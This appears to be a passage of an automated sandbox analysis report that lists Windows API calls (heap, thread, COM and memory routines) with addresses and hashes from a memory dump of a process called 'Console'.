                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,.ctor,?,?,?,?,?,7CAB6A82,05C7D62C,0CB3F4BC,?), ref: 0104C639
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strcmp
                                                                                                                                                                                                                          • String ID: .ctor
                                                                                                                                                                                                                          • API String ID: 1004003707-2664864097
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0108A980: VirtualQuery.KERNEL32(?,?,0000001C,?,?,01085DB5,?,7CAB6A82), ref: 0108A99F
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 01085EDF
                                                                                                                                                                                                                          • SetEvent.KERNEL32(03BFE848,?,7CAB6A82), ref: 0108600C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentEventQueryThreadVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2478193043-0
                                                                                                                                                                                                                          • Opcode ID: 09c5f3fcec819108f0225c46ad4bf0eca4d56b39ff148d400d6ab21b37cd7cc4
                                                                                                                                                                                                                          • Instruction ID: bd8b549fa10f569f936d7d8cc840b160bfef9278a2fdb763978503cbe5035b17
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09c5f3fcec819108f0225c46ad4bf0eca4d56b39ff148d400d6ab21b37cd7cc4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59716A70A04249CFEB14EFA8C9887ADBBF4FB05314F1045ADD8859B392DB7A9944CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 01223C50: HeapFree.KERNEL32(00000000,?,?,?), ref: 01223D68
                                                                                                                                                                                                                            • Part of subcall function 01097970: SetThreadErrorMode.KERNEL32(00008001,?,7CAB6A82,?,00000000), ref: 010979A9
                                                                                                                                                                                                                            • Part of subcall function 01097970: GetLastError.KERNEL32(?,?,00000000), ref: 010979C5
                                                                                                                                                                                                                            • Part of subcall function 01097970: SetThreadErrorMode.KERNEL32(?,00000000,?,00000000), ref: 010979DF
                                                                                                                                                                                                                            • Part of subcall function 01097970: SetLastError.KERNEL32(00000000,?,00000000), ref: 010979E6
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000008,?,?,?,?,?,?,7CAB6A82,?,?), ref: 0141AC57
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,7CAB6A82,?,?,00000000,014F65ED,000000FF,?,00000008,?,?,?,?,?,?,7CAB6A82), ref: 0141AD0E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error$Last$FreeModeThread$HeapLibrary
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3385596422-0
                                                                                                                                                                                                                          • Opcode ID: dea45124f5b2b33ed674b8abb26ad5e30d9d028b62e2eb7fbf2f2cfbb10ecb71
                                                                                                                                                                                                                          • Instruction ID: 84c29440310e886b63a7bcc634f016d174326c37f8a996dbbfb9092825e32d6c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dea45124f5b2b33ed674b8abb26ad5e30d9d028b62e2eb7fbf2f2cfbb10ecb71
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6141BCB0601B06AFD714CF19C814B5AFBF4FB04724F10865EE8189BB90E779A914CBC0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CoGetContextToken.OLE32(?,7CAB6A82,?,?), ref: 01086F23
                                                                                                                                                                                                                          • CoUninitialize.COMBASE(7CAB6A82), ref: 01086FA7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ContextTokenUninitialize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3685926914-0
                                                                                                                                                                                                                          • Opcode ID: 7f6a14618ff4eab59afb1096b00e6f4e18bead183be823f0743c7281082133f6
                                                                                                                                                                                                                          • Instruction ID: f6f7cb5c5e9419f25a7742837833478d53c3c4da9fb938232e9d4bc5238d5ff2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f6a14618ff4eab59afb1096b00e6f4e18bead183be823f0743c7281082133f6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2541CB31A04706CBEB25AF6CD9487AABBE0EB00715F1041AEE8E597792D736E405CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 010891C8
                                                                                                                                                                                                                          • CoRegisterInitializeSpy.OLE32(00000000,?), ref: 01089275
                                                                                                                                                                                                                            • Part of subcall function 010893A0: CoUninitialize.OLE32(7CAB6A82,?,?,?,?,?,?,?,00000000,014C8A45,000000FF,?,010891FA), ref: 0108940A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentInitializeRegisterThreadUninitialize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2553331981-0
                                                                                                                                                                                                                          • Opcode ID: 5bb802ed3c780fa3849c89d879efbf73e609e3bde6eda52933b84f3ddeed460b
                                                                                                                                                                                                                          • Instruction ID: 2bad6594df2e3149f6a379110887c40094280a1025241036e22d56a5fc5d92bc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bb802ed3c780fa3849c89d879efbf73e609e3bde6eda52933b84f3ddeed460b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E241E3B09057499BDB15DF68C800BAABBF4FB45714F2043AEE855E73C0D7769A00CB80
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 01418265
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2882836952-0
                                                                                                                                                                                                                          • Opcode ID: aea304235f1ba1ab7c2168cf2d43a633e261da61e87142de8317a46137722760
                                                                                                                                                                                                                          • Instruction ID: 9d11f2a1ade8fae8c64589a86b22e93ff4aec2916538d289c036a6feaae246aa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aea304235f1ba1ab7c2168cf2d43a633e261da61e87142de8317a46137722760
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93318F74A00609DFDB20DFA8EC4936ABFF4FB05314F104A6EE81597394D7799520CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,012D71E0,00000000,00000000,00000000), ref: 012D6703
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 012D671A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateHandleThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3032276028-0
                                                                                                                                                                                                                          • Opcode ID: aeb912f3434ce92c8c2ff92ea29ef576e3ade6d2febc927799e1e69fb1171b22
                                                                                                                                                                                                                          • Instruction ID: 3b6cabd99fb0c86376b44dfa774771c91faa73e59819c6671ab73b8fb8893f8f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aeb912f3434ce92c8c2ff92ea29ef576e3ade6d2febc927799e1e69fb1171b22
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B23159B4A04249EFEB14CF99C855BAEBFB4FB05714F10816EE500A7380D7B56505CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002,00000002), ref: 01215CAC
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(03BF0000,00000000,00000002,?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002), ref: 01215CCA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1357844191-0
                                                                                                                                                                                                                          • Opcode ID: 18f8da7196a101010b672ce19763a183de900f5922fe2f2b94ab799d3bb0d087
                                                                                                                                                                                                                          • Instruction ID: c091be7e1b88f7281abd3e92c0539d3937ae66ed53ad6194362c393a069724c5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18f8da7196a101010b672ce19763a183de900f5922fe2f2b94ab799d3bb0d087
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9601D43472030ABFDB11EBBEED04B9777EDEBA6911F104069F609C7214EA709840C790
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D7E
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(03BF0000,00000000,00000030,7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D9A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1357844191-0
                                                                                                                                                                                                                          • Opcode ID: 00cccfebc87c977b1938ebd9f6a3f96715fb790e656dd54d650b268c6ef01c37
                                                                                                                                                                                                                          • Instruction ID: 5987490427a56754f4de984419fb862e39e3e171261b44d1dc499e87a47c81d3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00cccfebc87c977b1938ebd9f6a3f96715fb790e656dd54d650b268c6ef01c37
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44012172B54691EFD732CF68DD04B96B7E8FB0AA20F4042AEE806C7354DB319800CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82,00000002), ref: 01215D0C
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(03BF0000,00000000,?,00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82), ref: 01215D28
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1357844191-0
                                                                                                                                                                                                                          • Opcode ID: cb1dad278327db0c1d8f436cc6ca95aac5895ffcd5c68a42261977809aa89b0a
                                                                                                                                                                                                                          • Instruction ID: c27eaea253d8514ac6e53721c21e230e85941cbea0904525b578836858be7304
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb1dad278327db0c1d8f436cc6ca95aac5895ffcd5c68a42261977809aa89b0a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CF09B74720252DFE726DB79DD0CB5737D8BB5A751F8444A8E609C7718DA248841C750
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?), ref: 01091E7C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: 6faa9fcf6efcbcec86822c9b4b306aaf2547f16d370efd08d072de8563fb8f76
                                                                                                                                                                                                                          • Instruction ID: 587faa7800b3ae9e70da9fd5316758fe8dfa5c78f143bb4d2408d90d11a44adb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6faa9fcf6efcbcec86822c9b4b306aaf2547f16d370efd08d072de8563fb8f76
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FF1C330B0030A9FEF65CF58C8A5BAEBBF1FF45360F154098E985AB291D774A841DB50
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,?,00000000), ref: 01090C16
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 01090EFF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: d943e962dcfe9157a475cd81603d2b2a1aa2937ec3e5fab4113d58d0e27f6c4b
                                                                                                                                                                                                                          • Instruction ID: e0ad87da8ceaccc07a59b0298bc10f48475ef9192d12e27dd6ad2e9e1b715a13
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d943e962dcfe9157a475cd81603d2b2a1aa2937ec3e5fab4113d58d0e27f6c4b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99F1AF70E002199FDF24CFA8C860BADBBF9EF44314F148199E959AB395DB35A942DF40
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(0163EA90,?,?,?,7CAB6A82,00000000,?,00000000), ref: 00FD8FEC
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 00FD9043
                                                                                                                                                                                                                            • Part of subcall function 0115DFB0: SetEvent.KERNEL32(03C16350,03C16300,00000001,0115DCA4), ref: 0115E020
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEventFreeHeapLeaveSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3469919578-0
                                                                                                                                                                                                                          • Opcode ID: 9c540064c1b2c9676742a4c3b5f049ed89b04bf717433e813707d0247d3345a4
                                                                                                                                                                                                                          • Instruction ID: 84930a41cd98ec56f17d22051971f4700ddcf379e71af04d2e4f5007735a73cb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c540064c1b2c9676742a4c3b5f049ed89b04bf717433e813707d0247d3345a4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03C11171904309EFDB20CFA8D884BAEBBF6FB45354F08845AEC489B351CB75A805DB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 010619A8
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000010), ref: 010619C5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                          • Opcode ID: b886b37c87e3264f18db8b6415dd7d331e5e8e537bf00ffba5e67c9eb2c9aad5
                                                                                                                                                                                                                          • Instruction ID: 0844ee840649c73f466f1b8feb6737e73c4c517629e39023c6278ce028e37f9c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b886b37c87e3264f18db8b6415dd7d331e5e8e537bf00ffba5e67c9eb2c9aad5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37A1C1B0A00745DFEB61CF69C4447AEBBF8FB44718F1086ADD8959B781D7B9A904CB80
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0108673E
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 01086791
                                                                                                                                                                                                                            • Part of subcall function 0115DFB0: SetEvent.KERNEL32(03C16350,03C16300,00000001,0115DCA4), ref: 0115E020
                                                                                                                                                                                                                            • Part of subcall function 0115D9F0: LeaveCriticalSection.KERNEL32(03BFE840,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,80131506), ref: 0115DA39
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCriticalEventFreeHandleHeapLeaveSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2285707350-0
                                                                                                                                                                                                                          • Opcode ID: 17b8f4cf2e4e6561ac12f369bb6a8e4d10877c8d30fbaf5d187534a9fe60b3fe
                                                                                                                                                                                                                          • Instruction ID: e8ce2126ad996d5787635daffaab80e8f3939c20e6bfda14c4d4281525c80911
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17b8f4cf2e4e6561ac12f369bb6a8e4d10877c8d30fbaf5d187534a9fe60b3fe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA71B4B0A04316CBEF65AF68C4487AABBF0BB00314F15076DD9E95B2D1CBB69584CBC0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?), ref: 0122AAD2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InfoSystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 31276548-0
                                                                                                                                                                                                                          • Opcode ID: 0773019d9606f7e04b6a6cb01159e87b5dab97e6019f26b82f27dc8f2160316b
                                                                                                                                                                                                                          • Instruction ID: 0c394a002bcc5c5e6009d050042581c28ccc26d7baed8577022c1fba0b798a8b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0773019d9606f7e04b6a6cb01159e87b5dab97e6019f26b82f27dc8f2160316b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E221E53161022AAFDB24EA69C484BAD77FAEF64314F144099DA028BE52FB75DD42C790
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,?,00000018,0000000C,7CAB6A82,00000000,00000000,?,?,00000000,014D42B0,000000FF,?,00000000,00FE37F7,00000000), ref: 01151C85
                                                                                                                                                                                                                            • Part of subcall function 01151AF0: RtlFreeHeap.NTDLL(00000000,?,00000000,0000000C,?,?,01151C48,0000000C,7CAB6A82,00000000,00000000,?,?,00000000,014D42B0,000000FF), ref: 01151B17
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: fe6635dc60da77562c471b336cd36b94545237acdee0598c0eecfacac21bf7f3
                                                                                                                                                                                                                          • Instruction ID: 30bcd1f6ceeff17fd42a5c10ac99cc38ec35d7ed5d324a28e2956ea8d26c021b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe6635dc60da77562c471b336cd36b94545237acdee0598c0eecfacac21bf7f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40219AB5A00A15EFDB26CF18C984B66FBE9FB08710F04855AE929DB750D770B810CBA0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00010004,?), ref: 01086563
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                                          • Opcode ID: bcbdd4644a94d973dfe0d0e58c04b477a302b426e6946bf034a3db1c248c3966
                                                                                                                                                                                                                          • Instruction ID: 34c9fb1ba726b2987e38ed627a96df13740eaf7bd44873f1eb5e4944fee0fe1a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcbdd4644a94d973dfe0d0e58c04b477a302b426e6946bf034a3db1c248c3966
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3001D6726056155FD721AE2CDC00BDABBD8EB58761F01416AEDD8C7244EB72E86087E1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,?,00000000,0000000C,?,?,01151C48,0000000C,7CAB6A82,00000000,00000000,?,?,00000000,014D42B0,000000FF), ref: 01151B17
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: 6ff8f95e87b07234be3e4bd19103e3d20718061ff4e53aefb34fccbf09da7716
                                                                                                                                                                                                                          • Instruction ID: fc4a4023a7e460d074be12fe528edef45b2d5b0ec5eb329025db1650de92b377
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ff8f95e87b07234be3e4bd19103e3d20718061ff4e53aefb34fccbf09da7716
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27E06D72200214FBDB255F0DE880F95BBACEB457A1F150036EE14AB215D370BC60CBB5
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,7CAB6A82,?,014B5610,000000FF,?,014AB3A3,00000000,?,01229DF6,00000000,00000030,7CAB6A82,?,00000000), ref: 01215E12
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: b81dff954ce05de44e1e94c09b846d4af303422e7804538788814ce4164f0b3b
                                                                                                                                                                                                                          • Instruction ID: fee0cb2399b4767467e94e9a97b0174d15b582906cba5485220759adcc2a6b06
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b81dff954ce05de44e1e94c09b846d4af303422e7804538788814ce4164f0b3b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AAE09275A44548EFC721CF49ED41F56B7ECF709A10F10466AF919D3790D735A420CB50
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 01085D50: SetEvent.KERNEL32(03BFE848,?,7CAB6A82), ref: 0108600C
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 010BB2D6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EventFreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2264064561-0
                                                                                                                                                                                                                          • Opcode ID: 6bec9b0595a12c200f32f0f68673076f44c6b41f5a472de4fe175e0e3f0b736f
                                                                                                                                                                                                                          • Instruction ID: 80a4b44e2f352ae6eb0419733db140cfe0f6ba1e467186e31b0da1a18de9b032
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bec9b0595a12c200f32f0f68673076f44c6b41f5a472de4fe175e0e3f0b736f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57818DB0A002189FEB65CF68DC84BEDBBF5FF04304F544199D999AB291DB749984CF90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00FFE830: EnterCriticalSection.KERNEL32(00000000,?,00000000,03C176F0,00000000,?,010E27AE,?,01229EF5), ref: 00FFE8B9
